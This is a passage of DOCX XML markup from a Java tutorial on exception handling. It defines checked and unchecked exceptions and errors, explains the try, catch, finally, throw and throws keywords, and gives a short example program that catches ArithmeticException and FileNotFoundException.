        </w:rPr>
        <w:t>Exception</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A condition that a program can handle (e.g., file not found, division by zero).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A959858" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Represents serious problems that a program cannot handle (e.g., out of memory, JVM crash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580264E0" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Checked Exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exceptions that are checked at compile-time. These exceptions must be either caught or declared in the method signature using throws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE4B76B" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example: IOException, SQLException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575D801A" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Unchecked Exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exceptions that are not checked at compile-time. These are usually runtime exceptions that occur due to logical errors (e.g., NullPointerException, ArrayIndexOutOfBoundsException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39084594" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example: NullPointerException, ArithmeticException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D621A55" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="909"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Error</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A subclass of Throwable that represents serious issues (like OutOfMemoryError) which cannot be handled by the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0798E102" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exception Handling Syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFCD110"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Java provides a set of keywords for handling exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ED034B" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines a block of code to be monitored for exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A41BBB" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>catch</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Defines a block of code to handle the exception that was thrown by the try block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C89359" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A block of code that always runs, regardless of whether an exception is thrown or not. It is often used for cleanup code (e.g., closing resources like files, database connections).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C9A2F0" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to explicitly throw an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177C905B" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="910"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throws</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used in method signatures to declare that a method may throw one or more exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BAAB42" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of Exception Handling in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3448BF4B"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import java.io.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65DF828D" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA0410D"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public class ExceptionHandlingExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EC63CC"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 xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BD34F2"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 xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4E55C"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 xml:space="preserve">            // Code that might throw an exception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FFB74D"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 xml:space="preserve">            int result = 10 / 0; // Division by zero (ArithmeticException)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D27E1FE"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 xml:space="preserve">            System.out.println("Result: " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E15D93C"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 xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273BDEB1"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 xml:space="preserve">            // Reading a file that doesn't exist (FileNotFoundException)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDAE493"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 xml:space="preserve">            FileInputStream file = new FileInputStream("nonexistentFile.txt");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7F9EAF"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 xml:space="preserve">        } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F7A420"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 xml:space="preserve">        // Handling specific exceptions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27601F8A"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 xml:space="preserve">        catch (ArithmeticException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA6C8A7"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 xml:space="preserve">            System.out.println("Error: Cannot divide by zero!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726C6823"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 xml:space="preserve">        } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E3ECC4"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 xml:space="preserve">        catch (FileNotFoundException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FF0455"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 xml:space="preserve">            System.out.println("Error: File not found!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755DE49"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 xml:space="preserve">        } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D7334"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 xml:space="preserve">        // Catching any other exceptions (Generic catch block)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2479862E"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 xml:space="preserve">        catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651D68F4"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 xml:space="preserve">            System.out.println("An unknown error occurred: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3450351A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041205D5"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 xml:space="preserve">        finally {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4276789F"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 xml:space="preserve">            System.out.println("Finally block executed.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE4719"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 xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FA7409"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 xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21422A9A" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02692BAB" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BCEACF" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>try block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The code that could throw an exception is placed inside the try block. In this case, both a division by zero and a file reading operation are included.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588B6B5" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>catch block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If an exception occurs, the catch block will handle it. You can catch specific exceptions like ArithmeticException or FileNotFoundException, or you can have a general Exception block to handle any exception that wasn't caught by a specific catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D60E61" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="911"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>finally block</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This block will always be executed, regardless of whether an exception occurred or not. It is usually used to clean up resources like closing files or database connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F263CC" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC" w:rsidP="006800ED">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Types of Exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEB6AAB" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Checked Exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These exceptions are checked during compile time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6167E8A0" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example: IOException, SQLException.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A543F67" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>These must be handled by the programmer either using try-catch or by declaring them in the method signature with throws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D11473B" w14:textId="77777777" w:rsidR="00A45CEC" w:rsidRPr="00CE4B95" w:rsidRDefault="00A45CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="912"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Unchecked Exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: These are runtime exceptions that occur due to programming bugs or logic errors.</w:t>
      </w:r>
    </w:p>
